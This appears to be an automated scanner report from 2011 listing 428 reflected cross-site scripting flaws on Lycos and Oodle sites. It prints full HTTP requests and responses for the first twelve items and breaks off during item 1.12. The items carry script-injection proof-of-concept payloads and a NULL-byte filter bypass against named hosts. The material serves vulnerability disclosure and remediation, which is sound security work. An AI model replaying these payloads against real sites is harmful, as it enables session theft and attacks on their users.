1.348. http://www.lycos.com.co/ [utm_campaign parameter]

1.349. http://www.lycos.com.co/ [utm_medium parameter]

1.350. http://www.lycos.com.co/ [utm_source parameter]

1.351. http://www.lycos.com.mx/ [name of an arbitrarily supplied request parameter]

1.352. http://www.lycos.com.mx/ [utm_campaign parameter]

1.353. http://www.lycos.com.mx/ [utm_medium parameter]

1.354. http://www.lycos.com.mx/ [utm_source parameter]

1.355. http://www.lycos.com.pe/ [name of an arbitrarily supplied request parameter]

1.356. http://www.lycos.com.pe/ [utm_campaign parameter]

1.357. http://www.lycos.com.pe/ [utm_medium parameter]

1.358. http://www.lycos.com.pe/ [utm_source parameter]

1.359. http://www.lycos.com.ve/ [name of an arbitrarily supplied request parameter]

1.360. http://www.lycos.com.ve/ [utm_campaign parameter]

1.361. http://www.lycos.com.ve/ [utm_medium parameter]

1.362. http://www.lycos.com.ve/ [utm_source parameter]

1.363. http://www.lycos.de/ [name of an arbitrarily supplied request parameter]

1.364. http://www.lycos.de/ [utm_campaign parameter]

1.365. http://www.lycos.de/ [utm_medium parameter]

1.366. http://www.lycos.de/ [utm_source parameter]

1.367. http://www.lycos.dk/ [name of an arbitrarily supplied request parameter]

1.368. http://www.lycos.dk/ [utm_campaign parameter]

1.369. http://www.lycos.dk/ [utm_medium parameter]

1.370. http://www.lycos.dk/ [utm_source parameter]

1.371. http://www.lycos.es/ [name of an arbitrarily supplied request parameter]

1.372. http://www.lycos.es/ [utm_campaign parameter]

1.373. http://www.lycos.es/ [utm_medium parameter]

1.374. http://www.lycos.es/ [utm_source parameter]

1.375. http://www.lycos.fi/ [name of an arbitrarily supplied request parameter]

1.376. http://www.lycos.fi/ [utm_campaign parameter]

1.377. http://www.lycos.fi/ [utm_medium parameter]

1.378. http://www.lycos.fi/ [utm_source parameter]

1.379. http://www.lycos.fr/ [name of an arbitrarily supplied request parameter]

1.380. http://www.lycos.fr/ [utm_campaign parameter]

1.381. http://www.lycos.fr/ [utm_medium parameter]

1.382. http://www.lycos.fr/ [utm_source parameter]

1.383. http://www.lycos.in/ [name of an arbitrarily supplied request parameter]

1.384. http://www.lycos.in/ [utm_campaign parameter]

1.385. http://www.lycos.in/ [utm_medium parameter]

1.386. http://www.lycos.in/ [utm_source parameter]

1.387. http://www.lycos.it/ [name of an arbitrarily supplied request parameter]

1.388. http://www.lycos.it/ [utm_campaign parameter]

1.389. http://www.lycos.it/ [utm_medium parameter]

1.390. http://www.lycos.it/ [utm_source parameter]

1.391. http://www.lycos.nl/ [name of an arbitrarily supplied request parameter]

1.392. http://www.lycos.nl/ [utm_campaign parameter]

1.393. http://www.lycos.nl/ [utm_medium parameter]

1.394. http://www.lycos.nl/ [utm_source parameter]

1.395. http://www.lycos.se/ [name of an arbitrarily supplied request parameter]

1.396. http://www.lycos.se/ [utm_campaign parameter]

1.397. http://www.lycos.se/ [utm_medium parameter]

1.398. http://www.lycos.se/ [utm_source parameter]

1.399. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

1.400. http://www.oodle.com/ [name of an arbitrarily supplied request parameter]

1.401. http://www.oodle.com/info/safety/ [REST URL parameter 1]

1.402. http://www.oodle.com/info/safety/ [REST URL parameter 1]

1.403. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]

1.404. http://www.oodle.com/info/safety/ [name of an arbitrarily supplied request parameter]

1.405. http://www.oodle.com/info/safety_scams/ [REST URL parameter 1]

1.406. http://www.oodle.com/info/safety_scams/ [REST URL parameter 1]

1.407. http://www.oodle.com/info/safety_scams/ [name of an arbitrarily supplied request parameter]

1.408. http://www.oodle.com/info/safety_scams/ [name of an arbitrarily supplied request parameter]

1.409. http://jobs.lycos.com/ [diktfc cookie]

1.410. http://jobs.lycos.com/ [diktfc cookie]

1.411. http://jobs.lycos.com/advanced-search [diktfc cookie]

1.412. http://jobs.lycos.com/advanced-search [diktfc cookie]

1.413. http://jobs.lycos.com/bootstrap.js [diktfc cookie]

1.414. http://jobs.lycos.com/bootstrap.js [diktfc cookie]

1.415. http://jobs.lycos.com/browse [diktfc cookie]

1.416. http://jobs.lycos.com/browse [diktfc cookie]

1.417. http://jobs.lycos.com/jobs/post [diktfc cookie]

1.418. http://jobs.lycos.com/jobs/post [diktfc cookie]

1.419. http://jobs.lycos.com/search [diktfc cookie]

1.420. http://jobs.lycos.com/search [diktfc cookie]

1.421. http://peoplesearch.lycos.com/ [diktfc cookie]

1.422. http://peoplesearch.lycos.com/ [diktfc cookie]

1.423. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.424. http://peoplesearch.lycos.com/bootstrap.js [diktfc cookie]

1.425. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.426. http://peoplesearch.lycos.com/frontdoor [diktfc cookie]

1.427. http://peoplesearch.lycos.com/index.php [diktfc cookie]

1.428. http://peoplesearch.lycos.com/index.php [diktfc cookie]



1. Cross-site scripting (reflected)
There are 428 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://classifieds.lycos.ca/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.ca
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70c28"><script>alert(1)</script>6e5ce3e150c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?70c28"><script>alert(1)</script>6e5ce3e150c=1 HTTP/1.1
Host: classifieds.lycos.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:19 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?70c28"><script>alert(1)</script>6e5ce3e150c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.2. http://classifieds.lycos.co.nz/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.co.nz
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 692ef"><script>alert(1)</script>756250e2c36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?692ef"><script>alert(1)</script>756250e2c36=1 HTTP/1.1
Host: classifieds.lycos.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?692ef"><script>alert(1)</script>756250e2c36=1&mobile=1" rel="nofollow">
...[SNIP]...

1.3. http://classifieds.lycos.co.uk/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.co.uk
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fd18"><script>alert(1)</script>d47af225d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3fd18"><script>alert(1)</script>d47af225d2=1 HTTP/1.1
Host: classifieds.lycos.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?3fd18"><script>alert(1)</script>d47af225d2=1&mobile=1" rel="nofollow">
...[SNIP]...

1.4. http://classifieds.lycos.com/ [mobile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The value of the mobile request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65c1c"><script>alert(1)</script>34090552b4d was submitted in the mobile parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?mobile=165c1c"><script>alert(1)</script>34090552b4d HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:56:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:56:36 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?mobile=165c1c"><script>alert(1)</script>34090552b4d&mobile=1" rel="nofollow">
...[SNIP]...

1.5. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea91"><script>alert(1)</script>1d982f7e555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ea91"><script>alert(1)</script>1d982f7e555=1 HTTP/1.1
Host: classifieds.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PENTA=173.193.214.243.1297090182456621; __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; __utmc=207906063; __utmb=207906063.5.10.1297090205

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:50:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:50:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?9ea91"><script>alert(1)</script>1d982f7e555=1&mobile=1" rel="nofollow">
...[SNIP]...

1.6. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /ajax/submission.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8a00"><script>alert(1)</script>c770fb4825e was submitted in the REST URL parameter 1. This input was echoed as d8a00"><script>alert(1)</script>c770fb4825e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%00d8a00"><script>alert(1)</script>c770fb4825e/submission.php HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:54:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/ajax%00d8a00"><script>alert(1)</script>c770fb4825e/submission.php?mobile=1" rel="nofollow">
...[SNIP]...

1.7. http://classifieds.lycos.com/ajax/submission.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /ajax/submission.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0046449"><script>alert(1)</script>2135f17cc50 was submitted in the REST URL parameter 2. This input was echoed as 46449"><script>alert(1)</script>2135f17cc50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submission.php%0046449"><script>alert(1)</script>2135f17cc50 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:55:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:55:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/ajax/submission.php%0046449"><script>alert(1)</script>2135f17cc50?mobile=1" rel="nofollow">
...[SNIP]...

1.8. http://classifieds.lycos.com/ajax/submission.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /ajax/submission.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0075d78"><script>alert(1)</script>3385c761fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75d78"><script>alert(1)</script>3385c761fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/submission.php/%0075d78"><script>alert(1)</script>3385c761fc4 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/ajax/submission.php/%0075d78"><script>alert(1)</script>3385c761fc4?mobile=1" rel="nofollow">
...[SNIP]...

1.9. http://classifieds.lycos.com/bootstrap.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /bootstrap.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360d0"><script>alert(1)</script>c5396564657 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /bootstrap.js360d0"><script>alert(1)</script>c5396564657 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:54:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:54:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/bootstrap.js360d0"><script>alert(1)</script>c5396564657?mobile=1" rel="nofollow">
...[SNIP]...

1.10. http://classifieds.lycos.com/browse/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /browse/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75633"><script>alert(1)</script>ba65cf1512 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse75633"><script>alert(1)</script>ba65cf1512/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/browse75633"><script>alert(1)</script>ba65cf1512/?mobile=1" rel="nofollow">
...[SNIP]...

1.11. http://classifieds.lycos.com/browse/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /browse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8d82"><script>alert(1)</script>b3badc87833 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /browse/?e8d82"><script>alert(1)</script>b3badc87833=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:22 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/browse/?e8d82"><script>alert(1)</script>b3badc87833=1&mobile=1" rel="nofollow">
...[SNIP]...

1.12. http://classifieds.lycos.com/community-rideshare/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community-rideshare/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2ff"><script>alert(1)</script>01dce6dd8cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community-ridesharedd2ff"><script>alert(1)</script>01dce6dd8cf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
